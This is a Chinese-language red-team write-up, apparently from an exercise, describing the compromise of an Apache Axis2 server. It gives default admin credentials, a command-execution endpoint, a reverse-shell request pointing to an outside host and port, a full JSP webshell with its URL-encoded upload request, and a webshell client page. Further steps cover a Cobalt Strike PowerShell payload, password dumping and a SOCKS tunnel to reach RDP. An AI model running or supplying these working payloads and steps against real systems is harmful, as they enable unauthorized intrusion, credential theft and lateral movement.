目前在参加xxx会议的重保.其中一个C段上的一个axis2有弱口令:
http://xxx.xxx.xxx.xxx:8090/axis2/axis2-admin/
弱口令账号admin
登陆密码:axis2
登陆进去后的页面是这个样子
wps1.jpeg

然后上面有Upload Service按钮点击进去后是这个样子
wps2.jpeg

这个只能上传arr的马 这个可以去百度找找上面很多写好了的.
上传之后可以在路径下执行命令/axis2/services/Cat/exec?cmd=ipconfig.然后可以执行很多东西比如.
/axis2/services/Cat/shell?host=192.168.76.1&port=2222 反弹shell
但是有个shell始终感觉不好使啊,下面是上传一句话木马
一句话木马如下

<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("//")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %>

编码后可以通过下面的URL上传到指定路径上去

http://xx.xx.xx.xx/axis2/services/Cat/writeStringToFile?data=%3c%25%20%69%66%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%66%22%29%21%3d%6e%75%6c%6c%29%28%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%4f%75%74%70%75%74%53%74%72%65%61%6d%28%61%70%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%22%2f%2f%22%29%2b%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%66%22%29%29%29%2e%77%72%69%74%65%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%74%22%29%2e%67%65%74%42%79%74%65%73%28%29%29%3b%20%25%3e&file=/E:/j2ee/Tomcat6014/webapps/axis2/1.jsp&encoding=utf-8&append=false

物理路劲可以通过下面的方式获得

http://xx.xx.xx.xx/axis2/services/Cat/getClassPathResponse获取物理路径.然后把file=后面的路径改了爆出来的路径

然后通过一句话服务器端上传代码,这个在中国处于ASP时代得时候大家用得比较多比如海洋木马什么得.

<html><head><title>JSP一句话木马客户端</title></head><div align=center> <font color=red>专用JSP木马连接器</font><br><form name=get method=post>服务端地址<input name=url size=110 type=text> <br><br><textarea name=t rows=20 cols=120>你提交的代码</textarea><br>保存成的文件名:<input name=f size=30 value=shell.jsp><input type=button onclick="javascript:get.action=document.get.url.value;get.submit()" value=提交> </form> <br>服务端代码:<br><textarea rows=5 cols=120><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> </textarea> </div></body>

wps3.jpeg

但是我的一句话木马是上传成功了但是不能执行不知道是什么情况,看了一下该服务器的杀毒还挺多的

wps4.jpeg

估计是杀了吧,然后尝试用cmd去重VPS上面去下载我的MSF马,但是一直提示错误,但是后面成功进入服务器后发现居然下载成功了(后话).
尝试了很多办法都没办法上传webshell,想着用pwoershell一句话反弹cs试试.
通过cs去生成payload.在/axis2/services/Cat/exec?cmd=这个地方执行我们的powershell 的payload.执行了大约30秒,嘿嘿成功上线了.

wps5.jpeg

常规操作读取密码cs自带的模块

wps6.jpeg

本来到了这步就该收集信息准备好横向了,可能以前就喜欢进人家的3389.虽然这个动作很大,但是这个习惯一直没改过,因该该服务器在内网所以得把端口给转发出来。
在CS里面转发端口要分2步
第一步点击要转发得IP地址然后右键依次选择图上得按钮点击Socks server
wps7.jpeg

点击后会出来这个对话框
wps8.jpeg

这个端口无所谓得,大点得好吧.
完了以后在选择
wps9.jpeg

然后代理出来就行.
配合本地的Proxifier代理上.
OK了,这个powershell一句话上线还真好使啊
wps11.jpeg

wps12.jpeg

到这里就完事了,不继续搞了

preView